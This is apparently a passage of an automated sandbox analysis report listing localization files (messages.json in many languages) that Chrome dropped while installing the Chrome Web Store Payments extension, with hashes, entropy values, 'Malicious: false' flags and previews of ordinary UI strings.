Preview:	{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	651
Entropy (8bit):	4.583694000020627
Encrypted:	false
SSDEEP:	12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
MD5:	6B3E916E8C1991AA0453CBA00FEDCAAA
SHA1:	D6366D15912E40CA107FD42BFE9579C3336A51F9
SHA-256:	A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
SHA-512:	87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.973349962793468
Encrypted:	false
SSDEEP:	24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
MD5:	05C437A322C1148B5F78B2F341339147
SHA1:	AB53003A678E44A170E73711FBD9949833BBF3AA
SHA-256:	A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
SHA-512:	C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
Malicious:	false
Preview:	{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:	12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.483686991119526
Encrypted:	false
SSDEEP:	12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
MD5:	91F5BC87FD478A007EC68C4E8ADF11AC
SHA1:	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
SHA-256:	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
SHA-512:	FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	661
Entropy (8bit):	4.450938335136508
Encrypted:	false
SSDEEP:	12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
MD5:	82719BD3999AD66193A9B0BB525F97CD
SHA1:	41194D511F1ACC16C1CA828AC81C18C8C6B47287
SHA-256:	4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
SHA-512:	D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	637
Entropy (8bit):	4.47253983486615
Encrypted:	false
SSDEEP:	12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
MD5:	6B2583D8D1C147E36A69A88009CBEBC7
SHA1:	4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
SHA-256:	6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
SHA-512:	37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	595
Entropy (8bit):	4.467205425399467
Encrypted:	false
SSDEEP:	12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
MD5:	CFF6CB76EC724B17C1BC920726CB35A7
SHA1:	14ED068251D65A840F00C05409D705259D329FFC
SHA-256:	C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
SHA-512:	53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.595421267152647
Encrypted:	false
SSDEEP:	12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
MD5:	3A01FEE829445C482D1721FF63153D16
SHA1:	F3EAAADDC03F943FC88B30B67F534AA13E3336DD
SHA-256:	0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
SHA-512:	3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	658
Entropy (8bit):	4.5231229502550745
Encrypted:	false
SSDEEP:	12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
MD5:	57AF5B654270A945BDA8053A83353A06
SHA1:	EEEF7A4F869F97CF471A05D345E74F982D15E167
SHA-256:	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
SHA-512:	5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	677
Entropy (8bit):	4.552569602149629
Encrypted:	false
SSDEEP:	12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
MD5:	8D11C90F44A6585B57B933AB38D1FFF8
SHA1:	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
SHA-256:	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
SHA-512:	D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	835
Entropy (8bit):	4.791154467711985
Encrypted:	false
SSDEEP:	24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
MD5:	E376D757C8FD66AC70A7D2D49760B94E
SHA1:	1525C5B1312D409604F097768503298EC440CC4D
SHA-256:	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
SHA-512:	673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	618
Entropy (8bit):	4.56999230891419
Encrypted:	false
SSDEEP:	12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
MD5:	8185D0490C86363602A137F9A261CC50
SHA1:	5BD933B874441CEACB9201CCC941FF67BAED6DC0
SHA-256:	A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
SHA-512:	D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	683
Entropy (8bit):	4.675370843321512
Encrypted:	false
SSDEEP:	12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
MD5:	85609CF8623582A8376C206556ED2131
SHA1:	1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
SHA-256:	32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
SHA-512:	27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	4.465685261172395
Encrypted:	false
SSDEEP:	12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
MD5:	EAB2B946D1232AB98137E760954003AA
SHA1:	60BDC2937905B311D2C9844DF2D639D7AC9F7F67
SHA-256:	C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
SHA-512:	970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	603
Entropy (8bit):	4.479418964635223
Encrypted:	false
SSDEEP:	12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
MD5:	A328EEF5E841E0C72D3CD7366899C5C8
SHA1:	2851ED658385804E87911643F5A4200B1FB26E13
SHA-256:	CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
SHA-512:	E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	697
Entropy (8bit):	5.20469020877498
Encrypted:	false
SSDEEP:	12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
MD5:	9B3A5D473C3F2BBFAEECE94A07A940B8
SHA1:	61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
SHA-256:	706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
SHA-512:	94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	631
Entropy (8bit):	5.160315577642469
Encrypted:	false
SSDEEP:	12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
MD5:	9F6B4D82A70C74CA751E2EAE70FAB5CF
SHA1:	0534F125FFCE8222277CF2BE3401C59DAF9217F8
SHA-256:	D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
SHA-512:	ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	665
Entropy (8bit):	4.66839186029557
Encrypted:	false
SSDEEP:	12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
MD5:	4CA644F875606986A9898D04BDAE3EA5
SHA1:	722A10569E93975129D67FBDB75B537D9D622AD1
SHA-256:	7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
SHA-512:	E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
Malicious:	false
Preview:	{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	671
Entropy (8bit):	4.631774066483956
Encrypted:	false
SSDEEP:	12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
MD5:	C5CE2C51391EAFD3DA9E4C71549A3C28
SHA1:	1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
SHA-256:	1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
SHA-512:	C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\nb\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	624
Entropy (8bit):	4.555032032637389
Encrypted:	false
SSDEEP:	12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
MD5:	93C459A23BC6953FF744C35920CD2AF9
SHA1:	162F884972103A08ADB616A7EB3598431A2924C5
SHA-256:	2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
SHA-512:	F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\nl\messages.json

Download File

